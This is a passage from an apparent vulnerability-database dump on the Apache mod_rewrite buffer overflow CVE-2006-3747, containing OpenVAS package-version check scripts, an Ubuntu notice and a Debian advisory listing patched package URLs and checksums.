advisory DSA 1131-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) this problem has been fixed in version 1.3.33-6sarge2.\n\nFor the unstable distribution (sid) this problems will be fixed shortly.\n\nWe recommend that you upgrade your apache package.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201131-1\";\ntag_summary = \"The remote host is missing an update to apache\nannounced via advisory DSA 1131-1.\n\nMark Dowd discovered a buffer overflow in the mod_rewrite component of\napache, a versatile high-performance HTTP server. In some situations a\nremote attacker could exploit this to execute arbitrary code.\";\n\n\nif(description)\n{\n script_id(57201);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:13:11 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2006-3747\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1131-1 (apache)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"apache-dev\", ver:\"1.3.33-6sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache-doc\", ver:\"1.3.33-6sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache-utils\", ver:\"1.3.33-6sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache\", ver:\"1.3.33-6sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache-common\", ver:\"1.3.33-6sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache-dbg\", ver:\"1.3.33-6sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache-perl\", ver:\"1.3.33-6sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache-ssl\", ver:\"1.3.33-6sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache-mod-perl\", ver:\"1.29.0.3-6sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:55:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747", "CVE-2005-3352"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-worker\n apache2\n apache2-prefork\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5021257 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:65142", "href": "http://plugins.openvas.org/nasl.php?oid=65142", "type": "openvas", "title": "SLES9: Security update for Apache2", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5021257.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for Apache2\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-worker\n apache2\n apache2-prefork\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5021257 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65142);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2006-3747\", \"CVE-2005-3352\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for Apache2\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache2-worker\", rpm:\"apache2-worker~2.0.49~27.51\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747", "CVE-2005-3352"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-worker\n apache2\n apache2-prefork\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5021257 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:136141256231065142", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065142", "type": "openvas", "title": "SLES9: Security update for Apache2", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5021257.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for Apache2\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-worker\n apache2\n apache2-prefork\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5021257 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65142\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2006-3747\", \"CVE-2005-3352\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for Apache2\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache2-worker\", rpm:\"apache2-worker~2.0.49~27.51\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-09T00:29:46", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3747"], "description": "Mark Dowd discovered an off-by-one buffer overflow in the mod_rewrite \nmodule's ldap scheme handling. On systems which activate \n\"RewriteEngine on\", a remote attacker could exploit certain rewrite \nrules to crash Apache, or potentially even execute arbitrary code \n(this has not been verified).\n\n\"RewriteEngine on\" is disabled by default. Systems which have this \ndirective disabled are not affected at all.", "edition": 6, "modified": "2006-07-28T00:00:00", "published": "2006-07-28T00:00:00", "id": "USN-328-1", "href": "https://ubuntu.com/security/notices/USN-328-1", "title": "Apache vulnerability", "type": "ubuntu", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-11-11T13:27:17", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3747"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1132-1 security@debian.org\nhttp://www.debian.org/security/ Steve Kemp\nAug 1st, 2005 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : apache2\nVulnerability : buffer overflow\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CVE-2006-3747\nCERT advisory : VU#395412\nDebian Bug : 380182\n\nMark Dowd discovered a buffer overflow in the mod_rewrite component of\napache, a versatile high-performance HTTP server. In some situations a\nremote attacker could exploit this to execute arbitary code.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 2.0.54-5sarge1.\n\nFor the unstable distribution (sid) this problem will be fixed shortly.\n\nWe recommend that you upgrade your apache2 package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1.dsc\n Size/MD5 checksum: 1153 4b2aeab1c5578a6879c1d036487c75a2\n http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1.diff.gz\n Size/MD5 checksum: 110080 57c824fbbbae3fa68d504797fa8e6341\n http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54.orig.tar.gz\n Size/MD5 checksum: 7493636 37d0d0a3e25ad93d37f0483021e70409\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/a/apache2/apache2-doc_2.0.54-5sarge1_all.deb\n Size/MD5 checksum: 3891046 f860e8207364bbbf05cfd81fa281508e\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-threadpool_2.0.54-5sarge1_all.deb\n Size/MD5 checksum: 33564 7d974c7e0f38c6e31017e712f15214fd\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_alpha.deb\n Size/MD5 checksum: 33488 f36f397f92e8946d342d8b939a8e1f41\n http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_alpha.deb\n Size/MD5 checksum: 865320 82e919111eccc60ed021aa196cc3cb00\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_alpha.deb\n Size/MD5 checksum: 246374 e6d9e455161bad25b178992b109c9375\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_alpha.deb\n Size/MD5 checksum: 241488 80524503bc76924132c26df38c61e5ad\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_alpha.deb\n Size/MD5 checksum: 245676 91eab40f8da34595f1a96c1b3c2254a3\n http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_alpha.deb\n Size/MD5 checksum: 167694 81b924d7aca297e86e600a3439d31d4a\n http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_alpha.deb\n Size/MD5 checksum: 168422 fa3bf3865b48d5a8324a6e6135ffaab1\n http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_alpha.deb\n Size/MD5 checksum: 97552 67c989219009488916ba16f399fa33fb\n http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_alpha.deb\n Size/MD5 checksum: 155792 ff3355874d8b7fa7c6ad1c55f8eabb8c\n http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_alpha.deb\n Size/MD5 checksum: 315260 ed3c2bc91b3be333c535aae01959f5f0\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_amd64.deb\n Size/MD5 checksum: 33482 431da06ae2973e4ab7e6195652b4f8b6\n http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_amd64.deb\n Size/MD5 checksum: 826686 3e2d13f95a82053ec6afa782ae62ffec\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_amd64.deb\n Size/MD5 checksum: 221350 7f3384834425befc9437ff16795fe827\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_amd64.deb\n Size/MD5 checksum: 216820 76034c08d148bf01b7eb72f5156fe2bc\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_amd64.deb\n Size/MD5 checksum: 220588 382bd5f3a47262c68c72566ae45aa005\n http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_amd64.deb\n Size/MD5 checksum: 167698 fb700ccba617ede30505a1a75f1528c1\n http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_amd64.deb\n Size/MD5 checksum: 168438 d0dd58b34bf5bb543f2bf9971bc30f17\n http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_amd64.deb\n Size/MD5 checksum: 92732 db6b4a3d3d2fa90a193c5d799b27161c\n http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_amd64.deb\n Size/MD5 checksum: 137334 5318191c95c001866e475a9f8218a0d0\n http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_amd64.deb\n Size/MD5 checksum: 278836 fd2955649002a6d3c4b6de7c9f18c794\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_arm.deb\n Size/MD5 checksum: 33490 1584e54d81dbfc1d45f6208ad268903d\n http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_arm.deb\n Size/MD5 checksum: 793694 233ea0fad9d5531cdc20182474c583fc\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_arm.deb\n Size/MD5 checksum: 202316 8916fa2da9d7740f4b1ac22f498bd47d\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_arm.deb\n Size/MD5 checksum: 197954 bbaefcea762f1600f0ba330d79d63b5e\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_arm.deb\n Size/MD5 checksum: 201344 c494ebb8a6662ebb777f9f615ea50579\n http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_arm.deb\n Size/MD5 checksum: 167706 ac66b709dbf32ea62406dd9131727f4b\n http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_arm.deb\n Size/MD5 checksum: 168440 bbb3c010fb98d9bc96da846cb57c1c80\n http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_arm.deb\n Size/MD5 checksum: 92652 92ac8c180bd95c8fcb4fbcc173fd93f9\n http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_arm.deb\n Size/MD5 checksum: 122384 4802054d8d5b2f25d5b4ed32f2bbcad2\n http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_arm.deb\n Size/MD5 checksum: 267920 02f1b191a308bdb9c4c9955a9a5170ea\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_i386.deb\n Size/MD5 checksum: 33486 7234f5717dbcbb800e90949d63cc1ddc\n http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_i386.deb\n Size/MD5 checksum: 812294 87b7c53659af00252c76484d030b76dd\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_i386.deb\n Size/MD5 checksum: 206644 f27a272c1e7c8a64fe3099e81879afe5\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_i386.deb\n Size/MD5 checksum: 202834 e9c259b62700c20aa0a123aac7ef8468\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_i386.deb\n Size/MD5 checksum: 206402 0b12002711a684dee34a6f158c08b008\n http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_i386.deb\n Size/MD5 checksum: 168868 9905d2bd31aaf49cb4c522a7130fc53e\n http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_i386.deb\n Size/MD5 checksum: 169670 6bdf51222903fb1af0a1950e8f02e7e6\n http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_i386.deb\n Size/MD5 checksum: 90916 15031d3164bf986a7d321d67f6f872f7\n http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_i386.deb\n Size/MD5 checksum: 130372 f3aa36ce42aca7c552630338b70c4147\n http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_i386.deb\n Size/MD5 checksum: 260374 ffbe645e8c6762205148f7aa8656a3c7\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_ia64.deb\n Size/MD5 checksum: 33486 0cd1947abffb3793f6c0dc7690632573\n http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_ia64.deb\n Size/MD5 checksum: 973648 7522385d947774e00a2b0f9c8586cc11\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_ia64.deb\n Size/MD5 checksum: 289276 bace1a0298d9336892bedbdc708f35ec\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_ia64.deb\n Size/MD5 checksum: 281296 6495947c25e20f5459d44980378420f7\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_ia64.deb\n Size/MD5 checksum: 287876 d63b895f7d31859642932ef11521120b\n http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_ia64.deb\n Size/MD5 checksum: 167676 ae253a0de588b5f3c75cd0139c23b94e\n http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_ia64.deb\n Size/MD5 checksum: 168418 b9a670874ff49ad8016ce34f65db75ca\n http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_ia64.deb\n Size/MD5 checksum: 106404 02c8d485338f0f86e61769bedfd1195e\n http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_ia64.deb\n Size/MD5 checksum: 177836 5f1d653818331006ad992b9f29fec1c3\n http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_ia64.deb\n Size/MD5 checksum: 328478 565500d14485fdfc229d31094477d79d\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_hppa.deb\n Size/MD5 checksum: 33488 c097912333905a2634218aca2f925af4\n http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_hppa.deb\n Size/MD5 checksum: 880192 bbf9181e42bf15946ea823bd4c60187a\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_hppa.deb\n Size/MD5 checksum: 228778 3f678491b1a4cdf7087ba3f7b579d2e4\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_hppa.deb\n Size/MD5 checksum: 222784 53c3247eb337389bf5610ffdc12101aa\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_hppa.deb\n Size/MD5 checksum: 227604 a55def8a3be473430a5add57f74a9e3e\n http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_hppa.deb\n Size/MD5 checksum: 167694 d986e8cc3ad0512e9e37d9d22209df6a\n http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_hppa.deb\n Size/MD5 checksum: 168436 77ed5eaaad9378052171f6317ba7f3b0\n http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_hppa.deb\n Size/MD5 checksum: 98822 048922c9ca8664f57b80c2f45f401d7f\n http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_hppa.deb\n Size/MD5 checksum: 144996 20192edf00b0449ef13a9c104750c1fb\n http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_hppa.deb\n Size/MD5 checksum: 285012 86cf97e94f01f18e3c2263d94eb3f4f2\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_m68k.deb\n Size/MD5 checksum: 33496 7ed8701d7c988c636a45eb66ea558b11\n http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_m68k.deb\n Size/MD5 checksum: 783354 bbd0d75542a89db2b9af3fda0801251b\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_m68k.deb\n Size/MD5 checksum: 188908 1798d4afe93c070b947be8d80097a3a5\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_m68k.deb\n Size/MD5 checksum: 185514 1c0bf8a9a6f173753080c77af11fde0b\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_m68k.deb\n Size/MD5 checksum: 188314 c188c7e4ab5c0bd9af90e3cce04cb119\n http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_m68k.deb\n Size/MD5 checksum: 167770 7c804084f4c5104ea0e1759664bfc950\n http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_m68k.deb\n Size/MD5 checksum: 168494 46bb18ed1ad60faee0356fcf927a8d7e\n http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_m68k.deb\n Size/MD5 checksum: 88058 4dd93405f96d8a1504403b5e807ed11d\n http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_m68k.deb\n Size/MD5 checksum: 117584 c02517bf4a19a576ceb5eb53788b8ddb\n http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_m68k.deb\n Size/MD5 checksum: 250068 f9858a08d86d3c5da03ce9ab5742c807\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_mips.deb\n Size/MD5 checksum: 33492 99198a05154084edcf0a023b4178c174\n http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_mips.deb\n Size/MD5 checksum: 807540 b5be0b94c36ef91ad37f8e97ee38da6b\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_mips.deb\n Size/MD5 checksum: 217966 40962c3bb0de39504e18a3e4d17960d4\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_mips.deb\n Size/MD5 checksum: 213184 17b42ce494efe8d695083b65c18bd04f\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_mips.deb\n Size/MD5 checksum: 217340 af8e8d55645e3f8515838cc6a4d0b96a\n http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_mips.deb\n Size/MD5 checksum: 167712 62bcc19fbe039422058de75fac9ef8a2\n http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_mips.deb\n Size/MD5 checksum: 168456 97347f55c5ca750159492a5e9fef0f05\n http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_mips.deb\n Size/MD5 checksum: 103016 7dfdbeb967d4db76535e326fe3bbe831\n http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_mips.deb\n Size/MD5 checksum: 134456 fefc232dee0333abe758f480922e485a\n http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_mips.deb\n Size/MD5 checksum: 286508 e450f3a5c862321728f126fd27e67da8\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_mipsel.deb\n Size/MD5 checksum: 33492 a0beae9521a8681328ed01833936c7e6\n http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_mipsel.deb\n Size/MD5 checksum: 807356 efa828902d16f408dc2fb75344a02484\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_mipsel.deb\n Size/MD5 checksum: 217238 f61a494fe69366f8f0f319ec622c125d\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_mipsel.deb\n Size/MD5 checksum: 212602 1e168ac088ef73b5a9ae213eaed0e65b\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_mipsel.deb\n Size/MD5 checksum: 216474 4da5c94813eb4c75e4c39e464b459286\n 